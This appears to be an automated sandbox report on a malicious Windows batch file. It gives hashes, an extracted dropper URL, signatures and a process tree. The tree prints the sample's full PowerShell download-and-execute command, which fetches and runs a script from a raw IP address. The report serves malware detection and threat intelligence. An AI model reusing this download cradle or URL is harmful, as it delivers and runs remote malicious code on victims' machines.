Analysis

  • max time kernel
    124s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-06-2020 16:10

General

  • Target

    3ba797dc80d83cbfa6d1a0d86e44b07f.bat

  • Size

    219B

  • MD5

    a492ab56e248bcde0ed2adcade97bcbb

  • SHA1

    bab084b7f54cee67117b058033b07cd52fe76647

  • SHA256

    8e2a0ee5856819aeb0f3e6c7e4815ad8491e263e90ef0ee6de93751a2e2aa455

  • SHA512

    3117a250261ea69a1d2ffd0cc04a7a7226ddc03f9d12a9bcb5eeff111677343c875341145328d4f5dd5c90de920363d47bf324c3fe119b00419f35b2ee688567

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/3ba797dc80d83cbfa6d1a0d86e44b07f

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3ba797dc80d83cbfa6d1a0d86e44b07f.bat"
    1⤵
      PID:3908
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3ba797dc80d83cbfa6d1a0d86e44b07f');Invoke-RVAOEIZDHXXE;Start-Sleep -s 10000"
        2⤵
          PID:1244
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:1692

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1692-0-0x0000000004870000-0x0000000004871000-memory.dmp

        Filesize

        4KB

      • memory/1692-2-0x0000000005020000-0x0000000005021000-memory.dmp

        Filesize

        4KB